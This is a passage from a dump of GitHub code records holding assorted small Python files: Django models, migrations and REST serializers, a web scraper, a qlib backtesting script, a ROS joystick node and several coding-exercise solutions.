models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField(blank=True)),\n ('output', models.TextField(blank=True)),\n ('deadline', models.DateField(default=datetime.date.today, blank=True)),\n ('dataset', models.ForeignKey(to='protocoltool.BasicDataset')),\n ('partner', models.ForeignKey(to='protocoltool.Partner')),\n ],\n ),\n migrations.AddField(\n model_name='expstep',\n name='partner',\n field=models.ForeignKey(to='protocoltool.Partner'),\n ),\n migrations.AddField(\n model_name='datareq',\n name='partner',\n field=models.ForeignKey(to='protocoltool.Partner'),\n ),\n ]\n","repo_name":"switchonproject/sip-html5-protocol-tool","sub_path":"protocoltool/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39546595227","text":"from lindshop.core.cart.models import Cart\nfrom lindshop.core.category.models import Category\nfrom django.conf import settings\nfrom lindshop import config\n\"\"\"\nThis is a Template Context Processor that include\nall Cart Items on every template, to make the cart\navailable globally on each page of the website.\n\nCall {{cart_items}} in template.\n\"\"\"\n\ndef shop_processor(request):\n\tcontext = {}\n\tcontext = get_cart(context, request)\n\tcontext = get_config(context)\n\tcontext = get_categories(context)\n\n\treturn context\n\ndef get_cart(context, request):\n\tif 'id_cart' in request.session:\n\t\ttry:\n\t\t\tcart = Cart.objects.get(pk=request.session['id_cart'])\n\t\t\titems = cart.cartitem_set.all()\n\t\texcept Cart.DoesNotExist:\n\t\t\titems = None\n\t\t\tcart = None\n\telse:\n\t\titems = None\n\t\tcart = None\n\n\tcontext['cart'] = cart\n\tcontext['cart_items'] = items\n\treturn context\n\ndef get_config(context):\n\tcontext['config'] = config\n\treturn context\n\ndef get_categories(context):\n\tcategories = Category.objects.filter(parent=None).order_by(config.category_order_by)\n\tcontext['categories'] = categories\n\treturn context","repo_name":"marcuslind90/lindshop","sub_path":"utils/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32850803136","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef get_html(url):\n response = requests.get(url)\n return response.text\n\ndef get_total_pages(html):\n soup = BeautifulSoup(html,'html.parser')\n print(soup.prettify())\n pages_ul = soup.find('div', class_=\"vm-pagination\").find('ul')\n last_page = pages_ul.find_all('li')[-3]\n total_page = last_page.find('a').get('href').split(',')\n return total_page[-1]\n\n# def get_page_data(html):\n# soup = BeautifulSoup(html, 'html.parser')\n# product_list = soup.find('div', class_=\"product vm-col vm-col-1 \")\n \n\ndef main():\n nootebooks_url = 'https://enter.kg/computers/noutbuki_bishkek'\n pages = 'results,'\n re = pages + str(get_total_pages(get_html(nootebooks_url)))\n return nootebooks_url + re\n\nlo = BeautifulSoup(main(),'html.parser')\nprint(lo.prettify())\n","repo_name":"ekroma/eorfjwfw","sub_path":"parsing_project/parcing.py","file_name":"parcing.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1154360983","text":"from __future__ import unicode_literals\nfrom 
django.core.management.base import BaseCommand\nfrom optparse import make_option\n\nimport json\n\nfrom pts.core.models import PackageName\nfrom pts.core.utils import get_or_none\n\n\nclass Command(BaseCommand):\n \"\"\"\n A Django management command which outputs all subscribers for the given\n packages or for all packages, depending on the input parameters.\n emails.\n \"\"\"\n args = '[package ...]'\n\n option_list = BaseCommand.option_list + (\n make_option('--inactive',\n action='store_true',\n dest='inactive',\n default=False,\n help='Show inactive (non-confirmed) subscriptions'),\n make_option('--json',\n action='store_true',\n dest='json',\n default=False,\n help='Output the result encoded as a JSON object'),\n make_option('--udd-format',\n action='store_true',\n dest='udd_format',\n default=False,\n help='Output the result in a UDD compatible format'),\n )\n\n help = (\"Get the subscribers for the given packages.\\n\"\n \"Outputs subscribers to all packges if no arguments are given\")\n\n def warn(self, message):\n if self.verbose:\n self.stderr.write(\"Warning: {}\".format(message))\n\n def handle(self, *args, **kwargs):\n self.verbose = int(kwargs.get('verbosity', 1)) > 1\n inactive = kwargs['inactive']\n self.out_packages = {}\n if len(args) == 0:\n for package in PackageName.objects.all():\n self.output_package(package, inactive)\n else:\n for package_name in args:\n package = get_or_none(PackageName, name=package_name)\n if package:\n self.output_package(package, inactive)\n else:\n self.warn(\"{package} does not exist.\".format(\n package=str(package_name)))\n\n format = 'default'\n if kwargs['json']:\n format = 'json'\n elif kwargs.get('udd_format', False):\n format = 'udd'\n\n return self.render_packages(format)\n\n def output_package(self, package, inactive=False):\n \"\"\"\n Includes the subscribers of the given package in the output.\n\n :param package: Package whose subscribers should be output\n :type package: :py:class:`Package `\n\n :param inactive: Signals whether inactive or active subscriptions\n should be output.\n \"\"\"\n subscriptions = package.subscription_set.filter(active=not inactive)\n self.out_packages[package.name] = [\n str(sub.email_user)\n for sub in subscriptions\n ]\n\n def render_packages(self, format):\n \"\"\"\n Prints the packages and their subscribers to the output stream.\n\n :param use_json: If ``True`` the output is rendered as JSON.\n Otherwise, a legacy format is used.\n :type use_json: Boolean\n \"\"\"\n if format == 'json':\n self.stdout.write(json.dumps(self.out_packages))\n elif format == 'udd':\n for package, subscribers in self.out_packages.items():\n subscriber_out = ', '.join(str(email) for email in subscribers)\n self.stdout.write(\"{}\\t{}\".format(package, subscriber_out))\n else:\n for package, subscribers in self.out_packages.items():\n subscriber_out = ' '.join(str(email) for email in subscribers)\n self.stdout.write(package + ' => [ ' + subscriber_out + ' ]')\n","repo_name":"sa2ajj/DistroTracker","sub_path":"pts/mail/management/commands/pts_dump_subscribers.py","file_name":"pts_dump_subscribers.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23173727245","text":"from genericpath import isdir\nimport os\nimport argparse\n\ndef makedirs(path):\n try:\n os.makedirs(path)\n except:\n pass\n\nparser = argparse.ArgumentParser()\nparser.add_argument('name')\n\nargs = parser.parse_args()\n\nname = args.name\n\nbase = 
os.path.dirname(__file__)\n\nname_ = name.lower()\n\ntest_dir = os.path.join(base, 'tests', name_)\n\nmakedirs(test_dir)\n\npro_path = os.path.join(test_dir, name_ + '.pro')\n\nclass_name = 'Test' + name\nheader = '{}.h'.format(class_name.lower())\ncpp = '{}.cpp'.format(class_name.lower())\n\nwith open(pro_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"QT += testlib\nSOURCES += main.cpp {}\nHEADERS += {}\n \"\"\".format(cpp, header))\n\nheader_path = os.path.join(test_dir, header)\ncpp_path = os.path.join(test_dir, cpp)\n\nmain_path = os.path.join(test_dir, 'main.cpp')\n\nwith open(main_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"#include \n#include \"{}\"\nQTEST_MAIN({})\n\"\"\".format(header, class_name))\n\nguard = class_name.upper() + '_H'\n\nwith open(header_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"#ifndef {}\n#define {}\n#include \nclass {} : public QObject\n{{\n Q_OBJECT\nprivate slots:\n}};\n#endif // {}\n\"\"\".format(guard, guard, class_name, guard))\n\nwith open(cpp_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"#include \"{}\"\n#include \n\"\"\".format(header))\n\ntests_dir = os.path.join(base, 'tests')\n\ndirs = [n for n in os.listdir(tests_dir) if os.path.isdir(os.path.join(tests_dir, n))]\n\npro_path = os.path.join(tests_dir, 'tests.pro')\n\nwith open(pro_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"TEMPLATE = subdirs\nSUBDIRS += {}\n\"\"\".format(\" \".join(dirs)))","repo_name":"mugiseyebrows/appveyor-tests","sub_path":"create-test.py","file_name":"create-test.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3266072851","text":"# Do not modify these lines\n__winc_id__ = '71dd124b4a6e4d268f5973db521394ee'\n__human_name__ = 'strings'\n\n# Add your code after this line\n#opdracht part 1\nscorer1 = \"Ruud Gullit\"\nscorer2 = \"Marco van Basten\"\ngoal_0 = 32\ngoal_1 = 54\nscorers = (((scorer1 + \" \" + str(goal_0)) + \", \") + (scorer2 + \" \" + str(goal_1)))\nreport = f\"{scorer1} scored in the {goal_0}nd minute\\n{scorer2} scored in the {goal_1}th minute\"\nprint (report)\n\n\n#opdracht part 2\nplayer = \"Ronald Koeman\" #opdr 1 naam van een speler\nfirst_name = player [0: player.find(\" \")] # opdr 2 variabele die de voornaam van de speler heeft\nprint (first_name) #opdr 2 controle voornaam\n\n#opdracht part 3 lengte van de achternaam van player\nlast_name_len = len(player [player.find(\" \")+1:len(player)])\nprint (last_name_len)\n\n# opdracht part 4 bewerking van de naam player\n# voornaam zie opdracht 2\nlast_name_player = player [player.find(\" \")+1:len(player)]# achternaam van player in een variabele zetten\nname_short = f\"{(first_name[0:1])}. {last_name_player}\"#voor en achternaam samenvoegen\nprint(name_short) \n\n#Opdracht part 5\n#firstname plus uitroepteken \nlengte_voornaam = len(first_name)\n# lengte is gelijk aan het aantal herhalingen\n#spatie tussen herhalingen, maar niet achter de laatste\nchant = (first_name + \"! 
\") * (lengte_voornaam -1) + (first_name + \"!\")\nprint(chant)\n\n#opdracht part 6 controle van de laatste letter \n#isoleren van de laatste letter van variabele chant\n#laatste letter vergelijken met een \" \" (spatie)\nlaatste_letter = (chant [len(chant) - 1])\ngood_chant = laatste_letter != \" \"\nprint (good_chant)\n\n\n\n\n","repo_name":"IngridDirckx/OpdrStrings","sub_path":"strings/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34737383636","text":"from django.urls import include, path\nfrom rest_framework import routers\n\nfrom financeiro import views, viewsets\n\nfinanceiro_router = routers.DefaultRouter()\nfinanceiro_router.register(\n \"conta-nivel1\",\n viewsets.ContaNivel1ViewSet,\n basename=\"conta_nivel1\",\n)\n\nfinanceiro_router.register(\n \"conta-nivel2\",\n viewsets.ContaNivel2ViewSet,\n basename=\"conta_nivel2\",\n)\nfinanceiro_router.register(\n \"conta-nivel3\",\n viewsets.ContaNivel3ViewSet,\n basename=\"conta_nivel3\",\n)\nfinanceiro_router.register(\n \"conta-nivel4\",\n viewsets.ContaNivel4ViewSet,\n basename=\"conta_nivel4\",\n)\nfinanceiro_router.register(\n \"caixa_banco\",\n viewsets.CaixaBancoViewSet,\n basename=\"caixa_banco\",\n)\n\nfinanceiro_router.register(\n \"tipo_documento_financeiro\",\n viewsets.TipoDocumentoFinanceiroViewSet,\n basename=\"tipo_documento_financeiro\",\n)\n\nfinanceiro_router.register(\n \"lancamento_financeiro\",\n viewsets.LancamentoFinanceiroViewSet,\n basename=\"lancamento_financeiro\",\n)\n\nfinanceiro_router.register(\n \"dado_bancario\",\n viewsets.DadoBancarioViewSet,\n basename=\"dado_bancario\",\n)\n\nfinanceiro_router.register(\n \"forma_pagamento\",\n viewsets.FormaPagamentoViewSet,\n basename=\"forma_pagamento\",\n)\n\nfinanceiro_router.register(\n \"parcela\",\n viewsets.ParcelaViewSet,\n basename=\"parcela\",\n)\n\nfinanceiro_router.register(\n \"tipo_conta\",\n viewsets.TipoContaViewSet,\n basename=\"tipo_conta\",\n)\n\nfinanceiro_router.register(\n \"banco\",\n viewsets.BancoViewSet,\n basename=\"banco\",\n)\n\nconta_nivel1_patterns = [\n path(\n \"conta-nivel1/\",\n views.ContaNivel1ListView.as_view(),\n name=\"conta_nivel1\",\n ),\n path(\n \"conta-nivel1-create/\",\n views.ContaNivel1Create.as_view(),\n name=\"conta_nivel1_create\",\n ),\n path(\n \"conta-nivel1-delete//\",\n views.ContaNivel1Delete.as_view(),\n name=\"conta_nivel1_delete\",\n ),\n path(\n \"conta-nivel1-update//\",\n views.ContaNivel1Update.as_view(),\n name=\"conta_nivel1_update\",\n ),\n]\n\nconta_nivel2_patterns = [\n path(\n \"conta-nivel2/\",\n views.ContaNivel2ListView.as_view(),\n name=\"conta_nivel2\",\n ),\n path(\n \"conta-nivel2-create/\",\n views.ContaNivel2Create.as_view(),\n name=\"conta_nivel2_create\",\n ),\n path(\n \"conta-nivel2-delete//\",\n views.ContaNivel2Delete.as_view(),\n name=\"conta_nivel2_delete\",\n ),\n path(\n \"conta-nivel2-update//\",\n views.ContaNivel2Update.as_view(),\n name=\"conta_nivel2_update\",\n ),\n]\n\nconta_nivel3_patterns = [\n path(\n \"conta-nivel3/\",\n views.ContaNivel3ListView.as_view(),\n name=\"conta_nivel3\",\n ),\n path(\n \"conta-nivel3-create/\",\n views.ContaNivel3Create.as_view(),\n name=\"conta_nivel3_create\",\n ),\n path(\n \"conta-nivel3-delete//\",\n views.ContaNivel3Delete.as_view(),\n name=\"conta_nivel3_delete\",\n ),\n path(\n \"conta-nivel3-update//\",\n views.ContaNivel3Update.as_view(),\n name=\"conta_nivel3_update\",\n 
),\n]\n\nconta_nivel4_patterns = [\n path(\n \"conta-nivel4/\",\n views.ContaNivel4ListView.as_view(),\n name=\"conta_nivel4\",\n ),\n path(\n \"conta-nivel4-create/\",\n views.ContaNivel4Create.as_view(),\n name=\"conta_nivel4_create\",\n ),\n path(\n \"conta-nivel4-delete//\",\n views.ContaNivel4Delete.as_view(),\n name=\"conta_nivel4_delete\",\n ),\n path(\n \"conta-nivel4-update//\",\n views.ContaNivel4Update.as_view(),\n name=\"conta_nivel4_update\",\n ),\n]\n\ncaixas_e_bancos_patterns = [\n path(\n \"caixas-e-bancos/\",\n views.CaixaBancoListView.as_view(),\n name=\"caixas_e_bancos\",\n ),\n path(\n \"caixas-e-bancos-create/\",\n views.CaixaBancoCreate.as_view(),\n name=\"caixas_e_bancos_create\",\n ),\n path(\n \"caixas-e-bancos-detail//\",\n views.CaixaBancoDetail.as_view(),\n name=\"caixas_e_bancos_detail\",\n ),\n path(\n \"caixas-e-bancos-update//\",\n views.CaixaBancoUpdate.as_view(),\n name=\"caixas_e_bancos_update\",\n ),\n path(\n \"caixas-e-bancos-delete//\",\n views.CaixaBancoDelete.as_view(),\n name=\"caixas_e_bancos_delete\",\n ),\n]\n\nlancamento_financeiro_patterns = [\n path(\n \"lancamento-financeiro-detail//\",\n views.LancamentoFinanceiroDetailView.as_view(),\n name=\"lancamento_financeiro_detail\",\n ),\n path(\n \"lancamento-financeiro-list/\",\n views.LancamentoFinanceiroListView.as_view(),\n name=\"lancamento_financeiro_list\",\n ),\n path(\n \"lancamento-financeiro-create/\",\n views.LancamentoFinanceiroCreateView.as_view(),\n name=\"lancamento_financeiro_create\",\n ),\n path(\n \"lancamento-financeiro-update//\",\n views.LancamentoFinanceiroUpdateView.as_view(),\n name=\"lancamento_financeiro_update\",\n ),\n path(\n \"lancamento-financeiro-receita-delete//\",\n views.LancamentoFinanceiroDeleteView.as_view(),\n name=\"lancamento_financeiro_delete\",\n ),\n]\n\nparcela_patterns = [\n path(\n \"parcela-delete//\",\n views.ParcelaDeleteView.as_view(),\n name=\"parcela_delete\",\n ),\n path(\n \"parcela-list/\",\n views.ParcelaListView.as_view(),\n name=\"parcela_list\",\n ),\n path(\n \"parcela-update//\",\n views.ParcelaUpdateView.as_view(),\n name=\"parcela_update\",\n ),\n]\n\ntipo_documento_financeiro_patterns = [\n path(\n \"tipo-documento-financeiro-create/\",\n views.TipoDocumentoFinanceiroCreateView.as_view(),\n name=\"tipo_documento_financeiro_create\",\n ),\n path(\n \"tipo-documento-financeiro-delete/\",\n views.TipoDocumentoFinanceiroDeleteView.as_view(),\n name=\"tipo_documento_financeiro_delete\",\n ),\n path(\n \"tipo-documento-financeiro/\",\n views.TipoDocumentoFinanceiroListView.as_view(),\n name=\"tipo_documento_financeiro_list\",\n ),\n path(\n \"tipo-documento-financeiro-update//\",\n views.TipoDocumentoFinanceiroUpdateView.as_view(),\n name=\"tipo_documento_financeiro_update\",\n ),\n]\n\n\nurlpatterns = (\n [\n path(\"api/\", include(financeiro_router.urls)),\n path(\n \"fluxo-caixa/\",\n views.FluxoCaixaView.as_view(),\n name=\"fluxo_caixa\",\n ),\n ]\n + conta_nivel1_patterns\n + conta_nivel2_patterns\n + conta_nivel3_patterns\n + conta_nivel4_patterns\n + caixas_e_bancos_patterns\n + lancamento_financeiro_patterns\n + parcela_patterns\n + tipo_documento_financeiro_patterns\n)\n","repo_name":"TimeNovaData/app_financeiro","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24786610887","text":"from typing import List\n\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n result = 
nums[0]\n localSum = nums[0]\n\n for i in range(1, len(nums)):\n localSum = max(localSum, 0) + nums[i]\n result = max(result, localSum)\n\n return result\n\n\nprint(Solution().maxSubArray([-1, -2, -3, -4, -5]))\n","repo_name":"mwjin/top-interview-questions","sub_path":"python/051_maximum_subarray.py","file_name":"051_maximum_subarray.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70910338727","text":"class Untitled:\n\n def answer(self):\n return 42\n\n def factorize(self, n):\n # take a number n and return a list of its factors.\n # how to prime factorize?\n primefactors = []\n # don't include 1\n limit = n+1\n for x in range(2, limit):\n if n % x == 0:\n # add x to the primefactors\n primefactors.append(x)\n primefactors.extend(self.factorize(n/x))\n break \n return primefactors\n\n # can we use a list comprehension?\n # primefactors = [factorize(x) for x in range(2, n/2)]","repo_name":"thunderlai/ProjectEuler","sub_path":"primefactors.py","file_name":"primefactors.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5322895372","text":"import contextlib\nfrom pyke import unique\nfrom pyke import knowledge_base\n\nclass question_base(knowledge_base.knowledge_base):\n r'''\n Each instance keeps track of a related set of questions.\n '''\n def __init__(self, name):\n r'''\n This is only used by the compiler, so only creates an instance\n suitable for pickling.\n\n Specifically, this means that the self.engine is just set to None\n and the instance is not registered with any engine.\n '''\n super(question_base, self).__init__(None, name, register=False)\n\n def add_question(self, question):\n name = question.name\n if name in self.entity_lists:\n raise AssertionError(\"question_base %s: duplicate question, %s\" %\n (self.name, name))\n self.entity_lists[name] = question\n question.set_knowledge_base(self)\n\n def get_ask_module(self):\n if hasattr(self, 'ask_module'): return self.ask_module\n return self.engine.get_ask_module()\n\nclass question(knowledge_base.knowledge_entity_list):\n r'''\n This represents one question in a question_base. 
It takes care of\n lookup parameters and caching and delegates the work of actually\n asking the user a question to the user_question object by calling its\n 'ask' method passing the format parameters.\n '''\n not_found = unique.unique('question.not_found')\n\n def __init__(self, name, params, answer_param, user_question):\n super(question, self).__init__(name)\n self.params = tuple(params)\n self.answer_param = answer_param\n try:\n self.answer_param_position = list(params).index(answer_param)\n except ValueError:\n raise ValueError(\"question %s: answer parameter, %s, \"\n \"not in params list: %s\" % (answer_param, params))\n self.input_param_positions = \\\n tuple([i for i in list(range(len(self.params))) if i != self.answer_param_position])\n self.user_question = user_question\n self.cache = {}\n\n def __repr__(self):\n return \"\" % \\\n (self.name, ', '.join('$' + p for p in self.params),\n self.answer_param, repr(self.user_question))\n\n def set_knowledge_base(self, question_base):\n self.knowledge_base = question_base\n self.user_question.set_question_base(question_base)\n\n def lookup(self, bindings, pat_context, patterns):\n input_params = tuple((self.params[i],\n str(patterns[i].as_data(pat_context)))\n for i in self.input_param_positions)\n format_params = dict(input_params)\n ans = self.cache.get(input_params, self.not_found)\n if ans is self.not_found:\n ans = self.cache[input_params] = \\\n self.user_question.ask(format_params)\n\n def gen():\n mark = bindings.mark(True)\n end_done = False\n try:\n if patterns[self.answer_param_position] \\\n .match_data(bindings, pat_context, ans):\n bindings.end_save_all_undo()\n end_done = True\n yield\n finally:\n if not end_done: bindings.end_save_all_undo()\n bindings.undo_to_mark(mark)\n\n return contextlib.closing(gen())\n\n def reset(self):\n self.cache.clear()\n\n","repo_name":"nvitucci/pyke","sub_path":"pyke/question_base.py","file_name":"question_base.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"15445580507","text":"'''\nn! means n × (n − 1) × ... × 3 × 2 × 1\n\nFor example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,\nand the sum of the digits in the number 10! 
is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.\n\nFind the sum of the digits in the number 100!\n'''\n\nimport datetime\nstart = datetime.datetime.now()\n\n\ndef fac(num):\n if num == 1 : return 1\n return num*fac(num-1)\n\n\ndef sum_of_digits(num):\n res = 0 \n for n in str(num) : res += int(n)\n return res \n\n\nprint(sum_of_digits(fac(100)))\nprint(datetime.datetime.now() - start)\n#0.0001s","repo_name":"skypinacolada/Project-Euler","sub_path":"020_Factorial_digit_sum.py","file_name":"020_Factorial_digit_sum.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19616842418","text":"#minikalkulator i python med en input\n\noperatorer =[\"+\",\"-\",\"*\",\"/\"]\n\nk= 0\ninp = str(input(\"Skriv inn regnestykke:\"))\ntekst = []\ntelle = 0\n\n#jobber foreløpig med denne delen av programmet, har ikke helt fått til å\n#legge til hvert tall og operator i en samlet liste.\nfor i in inp:\n telle = telle + 1\n if i==\"+\" or i ==\"-\" or i == \"/\" or i ==\"*\":\n while k> 3)%2 == 1:\n state_data = 0\n pub1.publish(state_data)\n elif (right_sig >> 1)%2 == 1:\n state_data = state_data ^ 1\n pub1.publish(state_data)\n elif right_sig%2 == 1:\n state_data = state_data ^ 2\n pub1.publish(state_data)\n\nrospy.init_node('state',anonymous=True)\n\nrospy.Subscriber('/joy/button', Int32MultiArray, joyB_cb)\n\npub1 = rospy.Publisher('/state', Int32, queue_size=10)\nwhile not rospy.is_shutdown():\n pass\n","repo_name":"nctu-penguin-po/statefile","sub_path":"src/joycontrol.py","file_name":"joycontrol.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5640888282","text":"import qlib\nfrom qlib.data import D\nfrom qlib.constant import REG_CN\nfrom qlib.workflow import R\nfrom qlib.utils import init_instance_by_config, flatten_dict\nfrom qlib.workflow.record_temp import SignalRecord, PortAnaRecord\nfrom qlib.contrib.evaluate import backtest_daily\nfrom qlib.contrib.evaluate import risk_analysis\nfrom qlib.contrib.strategy import TopkDropoutStrategy\nfrom qlib.contrib.data.handler import Alpha158\n\nfrom bias_data_handler import BIASDataHandler\n\nimport pandas as pd\nimport sys\n\nqlib.init(provider_uri=\"/home/greetlist/workspace/data_storage/qlib/\", region=REG_CN)\n\ncode_list = [\"002142.sz\"]\nfields = [\"$high\", \"$open\", \"$low\", \"$close\", \"$vol\", \"Mean($close, 13)\", \"Mean($close, 34)\", \"Mean($close, 55)\"]\nfields = [\"$close\", \"$vol\", \"($close - Mean($close, 13)) / Mean($close, 13) * 100\", \"Mean($close, 34)\", \"Mean($close, 55)\"]\n\ndata = D.features(code_list, fields, start_time=\"2017-01-01\", freq=\"day\")\n#print(data)\n\ndata_handler_config = {\n \"start_time\": \"2007-01-01\",\n \"end_time\": \"2023-11-01\",\n \"fit_start_time\": \"2007-01-01\",\n \"fit_end_time\": \"2022-01-01\",\n #\"instruments\": [\"601607.SH\", \"600759.SH\"],\n \"instruments\": [\"601607.SH\", \"600239.SH\", \"600251.SH\"],\n}\n\nh = Alpha158(**data_handler_config)\n\nprint(h.get_cols())\nprint(h.fetch(col_set=\"label\"))\nprint(h.fetch(col_set=\"feature\"))\n\nsys.exit(0)\n\ntask = {\n \"model\": {\n \"class\": \"LGBModel\",\n \"module_path\": \"qlib.contrib.model.gbdt\",\n \"kwargs\": {\n \"loss\": \"mse\",\n \"colsample_bytree\": 0.8879,\n \"learning_rate\": 0.0421,\n \"subsample\": 0.8789,\n \"lambda_l1\": 205.6999,\n \"lambda_l2\": 580.9768,\n \"max_depth\": 8,\n \"num_leaves\": 210,\n \"num_threads\": 10,\n 
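            # hyperparameters forwarded to LightGBM through qlib's LGBModel wrapper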
},\n },\n \"dataset\": {\n \"class\": \"DatasetH\",\n \"module_path\": \"qlib.data.dataset\",\n \"kwargs\": {\n \"handler\": {\n \"class\": \"BIASDataHandler\",\n \"module_path\": \"bias_data_handler\",\n \"kwargs\": data_handler_config,\n },\n \"segments\": {\n \"train\": (\"2007-01-01\", \"2021-12-31\"),\n \"valid\": (\"2022-01-01\", \"2022-12-31\"),\n \"test\": (\"2023-01-01\", \"2023-05-31\"),\n },\n },\n },\n}\n\nmodel = init_instance_by_config(task[\"model\"])\ndataset = init_instance_by_config(task[\"dataset\"])\n\nwith R.start(experiment_name=\"workflow\"):\n # train\n R.log_params(**flatten_dict(task))\n model.fit(dataset)\n\n res = model.predict(dataset).reset_index()\n res.to_csv('test.csv', index=False)\n\n # prediction\n recorder = R.get_recorder()\n sr = SignalRecord(model, dataset, recorder)\n sr.generate()\n\npred_score = pd.read_pickle(\"score.pkl\")[\"score\"]\n\nFREQ = \"day\"\nSTRATEGY_CONFIG = {\n \"topk\": 50,\n \"n_drop\": 5,\n # pred_score, pd.Series\n \"signal\": pred_score,\n}\n\nEXECUTOR_CONFIG = {\n \"time_per_step\": \"day\",\n \"generate_portfolio_metrics\": True,\n}\n\nbacktest_config = {\n \"start_time\": \"2023-06-01\",\n \"end_time\": \"2023-11-01\",\n \"account\": 100000000,\n \"benchmark\": \"601607.SH\",\n \"exchange_kwargs\": {\n \"freq\": FREQ,\n \"limit_threshold\": 0.095,\n \"deal_price\": \"close\",\n \"open_cost\": 0.0005,\n \"close_cost\": 0.0015,\n \"min_cost\": 5,\n },\n}\n\n# strategy object\nstrategy_obj = TopkDropoutStrategy(**STRATEGY_CONFIG)\n# executor object\nexecutor_obj = executor.SimulatorExecutor(**EXECUTOR_CONFIG)\n# backtest\nportfolio_metric_dict, indicator_dict = backtest(executor=executor_obj, strategy=strategy_obj, **backtest_config)\nanalysis_freq = \"{0}{1}\".format(*Freq.parse(FREQ))\n# backtest info\nreport_normal, positions_normal = portfolio_metric_dict.get(analysis_freq)\n\n# analysis\nanalysis = dict()\nanalysis[\"excess_return_without_cost\"] = risk_analysis(\n report_normal[\"return\"] - report_normal[\"bench\"], freq=analysis_freq\n)\nanalysis[\"excess_return_with_cost\"] = risk_analysis(\n report_normal[\"return\"] - report_normal[\"bench\"] - report_normal[\"cost\"], freq=analysis_freq\n)\n\nanalysis_df = pd.concat(analysis) # type: pd.DataFrame\n# log metrics\nanalysis_dict = flatten_dict(analysis_df[\"risk\"].unstack().T.to_dict())\n# print out results\nprint(f\"The following are analysis results of benchmark return({analysis_freq}).\")\nprint(risk_analysis(report_normal[\"bench\"], freq=analysis_freq))\nprint(f\"The following are analysis results of the excess return without cost({analysis_freq}).\")\nprint(analysis[\"excess_return_without_cost\"])\nprint(f\"The following are analysis results of the excess return with cost({analysis_freq}).\")\nprint(analysis[\"excess_return_with_cost\"])\n","repo_name":"Greetlist/qlib_research","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71914330089","text":"from django.db import models\r\n\r\n# Create your models here.\r\n\r\nst = [\"tttttttttttttttttttttttttttttttttttttt\", \"fdassasdfsafsafsafasdfasfasfas\", \"fsdfasfasfdsfasfasfsdfasfd\", \"fsdfasfsafasdfsdfsafsa\"]\r\n\r\nclass Results :\r\n def __init__(self, query=\"sample\", tweets=st, sentiment=0.5, sarcastic_response=\"yeah, right!\"):\r\n self.query = query\r\n self.tweets = tweets\r\n self.sentiment = sentiment\r\n self.sarcastic_response = 
sarcastic_response\r\n","repo_name":"chitrak7/SarcasmGenerator","sub_path":"sarcasmGen/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29273261955","text":"from rest_framework import serializers\nfrom .models import Product, Stock, StockProduct\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n class Meta:\n model = Product\n fields = ['id', 'title', 'description']\n\n\nclass ProductPositionSerializer(serializers.ModelSerializer):\n class Meta:\n model = StockProduct\n fields = ['id', 'product', 'price', 'quantity']\n\n\nclass StockSerializer(serializers.ModelSerializer):\n positions = ProductPositionSerializer(many=True)\n\n class Meta:\n model = Stock\n fields = ['id', 'address', 'positions']\n\n def create(self, validated_data):\n # достаем связанные данные для других таблиц\n positions = validated_data.pop('positions')\n stock = Stock.objects.create(**validated_data)\n\n for position in positions:\n StockProduct.objects.create(stock=stock, **position)\n\n return stock\n\n def update(self, instance, validated_data):\n # достаем связанные данные для других таблиц\n positions = validated_data.pop('positions')\n stock = super().update(instance, validated_data)\n\n for position in positions:\n try:\n position_product = position.get('product')\n stock_item = StockProduct.objects.get(stock=stock, product=position_product)\n stock_item.quantity = position.get('quantity', stock_item.quantity)\n stock_item.price = position.get('price', stock_item.price)\n stock_item.save()\n except StockProduct.DoesNotExist:\n StockProduct.objects.create(stock=stock, **position)\n\n return 